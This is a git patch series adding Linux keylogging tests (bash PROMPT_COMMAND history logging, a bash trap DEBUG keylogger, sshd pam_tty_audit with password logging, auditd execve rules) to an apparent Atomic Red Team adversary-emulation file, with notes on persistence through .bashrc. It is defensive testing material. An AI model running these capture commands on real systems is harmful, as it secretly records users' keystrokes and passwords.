From 2947b8d3da3bdbfba046b4753a3d7e9ac2800149 Mon Sep 17 00:00:00 2001 From: biot Date: Tue, 20 Jul 2021 23:46:53 +0100 Subject: [PATCH 1/5] T1056.001 --- atomics/T1056.001/T1056.001.yaml | 128 ++++++++++++++++++++++++++++++- 1 file changed, 126 insertions(+), 2 deletions(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index a09fdc50..51e5a88b 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -1,8 +1,8 @@ attack_technique: T1056.001 display_name: 'Input Capture: Keylogging' atomic_tests: + - name: Input Capture - auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 description: | Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) @@ -24,8 +24,8 @@ atomic_tests: Remove-Item $env:TEMP\key.log -ErrorAction Ignore name: powershell elevation_required: true + - name: Living off the land Terminal Input Capture on Linux with pam.d - auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b description: | Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. @@ -54,3 +54,127 @@ atomic_tests: sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth name: sh elevation_required: true + +- name: Logging bash history to syslog + description: | + There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. + + To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires to be run in a bash shell and that logger and tee are installed. + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" + executor: + name: sh + elevation_required: ture + command: | + PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' + echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" + tail /var/log/syslog + cleanup_command: | + unset PROMPT_COMMAND + +- name: Bash session based keylogger + description: | + When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. + + To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires to be run in a bash shell + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + get_prereq_command: | + echo "" + input_arguments: + output_file: + name: output_file + description: File to store captured commands + type: String + default: /tmp/.keyboard.log + executor: + name: command_prompt + elevation_required: false + command: | + trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG + echo "Hello World!" + cat #{output_file} + cleanup_command: | + rm #{output_file} + +- name: SSHD PAM keylogger + description: | + Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires sshd and auditd + prereq_command: | + if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" + input_arguments: + output_file: + name: user_account + description: Basic ssh user account for testing + type: account + default: user_account + executor: + name: command_prompt + elevation_required: true + command: | + cp -v /etc/pam.d/sshd /tmp/ + echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" + systemctl restart sshd + systemctl restart auditd + ssh #{user_account}@localhost + whoami + sudo su + whoami + exit + exit + cleanup_command: | + cp -fv /tmp/sshd /etc/pam.d/ + +- name: Auditd keylogger + description: | + The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires sshd and auditd + prereq_command: | + if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" + input_arguments: + output_file: + description: description + type: type + default: default + executor: + name: command_prompt + elevation_required: true + command: | + auditctl -a always,exit -F arch=b64 -S execve -k CMDS + auditctl -a always,exit -F arch=b32 -S execve -k CMDS + whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") + cleanup_command: | + systemctl restart auditd + From 244536527b470be57df2a67414e34db99cf0de66 Mon Sep 17 00:00:00 2001 From: biot Date: Wed, 21 Jul 2021 17:40:24 +0100 Subject: [PATCH 2/5] fix typo --- atomics/T1056.001/T1056.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 51e5a88b..a11de2d9 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -74,7 +74,7 @@ atomic_tests: echo "" executor: name: sh - elevation_required: ture + elevation_required: true command: | PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" From a8288151dba4c379243c2dddcfda54d6e0444276 Mon Sep 17 00:00:00 2001 From: biot Date: Wed, 21 Jul 2021 17:46:15 +0100 Subject: [PATCH 3/5] removed blank lines --- atomics/T1056.001/T1056.001.yaml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index a11de2d9..ef842974 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -1,7 +1,6 @@ attack_technique: T1056.001 display_name: 'Input Capture: Keylogging' atomic_tests: - - name: Input Capture description: | Utilize PowerShell and external resource to capture keystrokes @@ -24,7 +23,6 @@ atomic_tests: Remove-Item $env:TEMP\key.log -ErrorAction Ignore name: powershell elevation_required: true - - name: Living off the land Terminal Input Capture on Linux with pam.d description: | Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. @@ -54,7 +52,6 @@ atomic_tests: sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth name: sh elevation_required: true - - name: Logging bash history to syslog description: | There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. @@ -81,7 +78,6 @@ atomic_tests: tail /var/log/syslog cleanup_command: | unset PROMPT_COMMAND - - name: Bash session based keylogger description: | When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. @@ -112,7 +108,6 @@ atomic_tests: cat #{output_file} cleanup_command: | rm #{output_file} - - name: SSHD PAM keylogger description: | Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. @@ -149,7 +144,6 @@ atomic_tests: exit cleanup_command: | cp -fv /tmp/sshd /etc/pam.d/ - - name: Auditd keylogger description: | The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. @@ -177,4 +171,3 @@ atomic_tests: whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") cleanup_command: | systemctl restart auditd - From 61e63128beeba435fff48fabc2c2d774cdcd452e Mon Sep 17 00:00:00 2001 From: biot Date: Thu, 22 Jul 2021 14:35:54 +0100 Subject: [PATCH 4/5] fixed user_account --- atomics/T1056.001/T1056.001.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index ef842974..6085dc85 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -123,11 +123,10 @@ atomic_tests: get_prereq_command: | echo "" input_arguments: - output_file: - name: user_account - description: Basic ssh user account for testing - type: account - default: user_account + user_account: + description: Basic ssh user account for testing. + type: string + default: ubuntu executor: name: command_prompt elevation_required: true From 9372e962e7cb566c7e91053699c39b96829f241d Mon Sep 17 00:00:00 2001 From: biot Date: Wed, 28 Jul 2021 12:42:14 +0100 Subject: [PATCH 5/5] added guid's back in --- atomics/T1056.001/T1056.001.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 6085dc85..8c202651 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -2,6 +2,7 @@ attack_technique: T1056.001 display_name: 'Input Capture: Keylogging' atomic_tests: - name: Input Capture + auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 description: | Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) @@ -24,6 +25,7 @@ atomic_tests: name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d + auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b description: | Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.